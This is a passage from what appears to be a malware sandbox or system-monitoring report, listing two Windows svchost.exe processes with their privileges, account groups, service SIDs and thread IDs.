00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 126 os_tid = 0xb4c Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 131 os_tid = 0xb68 Thread: id = 132 os_tid = 0xac4 Thread: id = 133 os_tid = 0x324 Thread: id = 134 os_tid = 0x290 Thread: id = 135 os_tid = 0x548 Thread: id = 136 os_tid = 0x750 Thread: id = 137 os_tid = 0x6a0 Thread: id = 138 os_tid = 0x680 Thread: id = 139 os_tid = 0x66c Thread: id = 140 os_tid = 0x5fc Thread: id = 141 os_tid = 0x188 Thread: id = 142 os_tid = 0x140 Thread: id = 143 os_tid = 0x128 Thread: id = 144 os_tid = 0x2b0 Thread: id = 145 os_tid = 0x218 Thread: id = 146 os_tid = 0x1cc Thread: id = 180 os_tid = 0xb08 Thread: id = 184 os_tid = 0x6d8 Thread: id = 185 os_tid = 0x774 Thread: id = 186 os_tid = 0xbcc Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 147 os_tid = 0x638 Thread: id = 148 os_tid = 0x554 Thread: id = 149 os_tid = 0x720 Thread: id = 150 os_tid = 0x668 Thread: id = 151 os_tid = 0x65c Thread: id = 152 os_tid = 0x144 Thread: id = 153 os_tid = 0x110 Thread: id = 154 os_tid = 0x3f0 Thread: id = 155 os_tid = 0x3ec Thread: id = 156 os_tid = 0x3e4 Thread: id = 157 os_tid = 0x3e0 Thread: id = 158 os_tid = 0x3d0 Thread: id = 159 os_tid = 0x3cc Thread: id = 160 os_tid = 0x398 Thread: id = 161 os_tid = 0x394 Thread: id = 162 os_tid = 0x384 Thread: id = 163 os_tid = 0x380 Thread: id = 164 os_tid = 0x368 Thread: id = 165 os_tid = 0x350 Thread: id = 166 os_tid = 0x33c Thread: id = 182 os_tid = 0x25c Thread: id = 187 os_tid = 0xbd8